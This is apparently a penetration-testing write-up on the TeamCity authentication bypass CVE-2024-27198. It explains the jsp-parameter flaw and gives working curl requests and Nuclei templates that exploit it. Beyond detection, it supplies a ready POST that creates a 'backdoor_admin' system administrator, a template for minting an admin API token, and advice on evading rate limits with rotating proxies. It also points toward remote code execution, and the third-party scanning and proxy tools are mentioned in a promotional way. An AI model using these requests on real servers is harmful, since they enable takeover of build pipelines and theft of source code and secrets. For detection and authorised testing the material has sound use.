Technical Analysis of CVE-2024-27198: TeamCity Authentication Bypass
The authentication bypass vulnerability identified as CVE-2024-27198 targets the BaseController class within JetBrains TeamCity, specifically how it handles requests that fail to map to a defined handler. When a request is made to a non-existent resource, TeamCity’s web component attempts to resolve a view for the error state. An attacker can manipulate this logic by appending a jsp query parameter to the URL. If the initial path triggers a 404 response, the InternalResourceViewResolver incorrectly uses the value of the jsp parameter to serve the response. Because this process occurs after the initial AccessInterceptor check (which only validates the non-existent path), the attacker can effectively reach internal REST API endpoints without providing any credentials. This "alternative path" issue (CWE-288) provides a direct route to full administrative control over the CI/CD server.
Manual Verification and Initial Reconnaissance
Before automating the detection, we verify the bypass manually using curl. The most reliable method to confirm vulnerability without making state-changing requests is to query the /app/rest/server endpoint. This endpoint returns XML or JSON metadata about the TeamCity instance, including the version and build number. We trigger the bypass by requesting a random non-existent path like /hax and passing the target REST endpoint via the jsp parameter.
# Manual verification using curl to retrieve server information
curl -ik "http://teamcity.local:8111/hax?jsp=/app/rest/server"
# Expected output from a vulnerable instance:
# HTTP/1.1 200 OK
# Content-Type: application/xml
# ...
# <server version="2023.11.3 (build 147512)" versionMajor="2023" versionMinor="11" ... />
Identifying vulnerable assets at scale often starts with internet-wide reconnaissance. Using a tool like Zondex allows us to filter for exposed TeamCity instances by searching for specific HTTP response headers or the favicon hash (1017441730) associated with the service. This reconnaissance phase is critical for mapping the attack surface before deploying targeted scanners.
Constructing the Nuclei Template
To automate this check across hundreds of targets, we define a custom Nuclei template. The template needs to accomplish three things: target the correct bypass path, identify the specific response markers of the REST API, and ignore false positives where a generic 404 page might contain the search strings. We leverage the GET method and use the status_code and body matchers for validation.
id: CVE-2024-27198-TeamCity-Auth-Bypass
info:
name: JetBrains TeamCity - Authentication Bypass (CVE-2024-27198)
author: pentest-notes
severity: critical
description: |
An authentication bypass vulnerability in JetBrains TeamCity allows an
unauthenticated attacker to perform administrative actions by leveraging
an alternative path issue in the web component.
reference:
- https://www.rapid7.com/blog/post/2024/03/04/etr-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-cve-2024-27198-cve-2024-27199/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-27198
cwe-id: CWE-288
http:
- method: GET
path:
- "{{BaseURL}}/hax?jsp=/app/rest/server"
matchers-condition: and
matchers:
- type: word
words:
- "<server "
- "versionMajor="
- "versionMinor="
condition: and
- type: status
status:
- 200
Optimizing the Scan for Speed and OpSec
Running custom templates against a large number of IPs requires careful management of request rates and source attribution. In professional engagements, we integrate these automated checks into a broader workflow using Secably, which provides a structured environment for continuous vulnerability scanning and management. This ensures that as new TeamCity instances are spun up or moved, they are immediately tested against the CVE-2024-27198 signature.
Furthermore, many organizations employ WAFs or IP-based rate limiting that can trigger on high-velocity Nuclei scans. To maintain the integrity of the scan and prevent our primary testing infrastructure from being blacklisted, we route our traffic through GProxy. This allows for IP rotation and ensures that each request appears to originate from a unique, clean exit node, bypasses simple volumetric blocks, and provides a more accurate view of the target’s external posture.
# Running Nuclei with the custom template through a proxy
nuclei -t teamcity-bypass.yaml -list targets.txt -proxy http://gproxy-node:8080 -rate-limit 50
Beyond Detection: Exploitation Nuances
While the /app/rest/server endpoint is perfect for non-intrusive detection, the actual impact of CVE-2024-27198 is best demonstrated by creating a new administrative user or generating a REST API token. The bypass applies to POST requests as well. An attacker can send a JSON payload to the /app/rest/users endpoint through the same jsp parameter trick. Note that the URI must be properly encoded or handled by the server's path normalization logic.
In some versions, a semicolon trick (;) is required to terminate the path effectively within the internal dispatcher. For example, /hax?jsp=/app/rest/users;.jsp. This variation ensures the InternalResourceViewResolver treats the target as a JSP resource while the REST dispatcher interprets it as a valid API call. Once a user is created, the attacker gains full persistence and can move toward Remote Code Execution (RCE) by abusing the /app/rest/debug/processes endpoint or modifying build configurations to include malicious scripts.
# Example POST request to create an administrator
# Note: This is high-impact and should only be performed in authorized environments.
curl -X POST -ik "http://teamcity.local:8111/hax?jsp=/app/rest/users" \
-H "Content-Type: application/json" \
-d '{"username": "backdoor_admin", "password": "ComplexPassword123!", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}'
Advanced Nuclei Logic for Token Generation
If you need to verify the ability to generate tokens without creating a persistent user, you can adapt the template to attempt token generation for the default administrative account (ID: 1). This is often a more effective proof-of-concept for internal risk assessments as it demonstrates the ability to act on behalf of existing high-privilege users.
# Partial Nuclei snippet for token generation verification
- method: POST
path:
- "{{BaseURL}}/hax?jsp=/app/rest/users/id:1/tokens/POC-Token"
matchers:
- type: word
words:
- "tokenValue="
- "creationDate="
condition: and
The severity of this bypass cannot be overstated. Because TeamCity acts as a central hub for source code, secrets, and deployment pipelines, a compromise here is a "keys to the kingdom" scenario. Pentesters should prioritize identifying these instances using reconnaissance tools and immediately validating them with high-fidelity templates like the one provided above.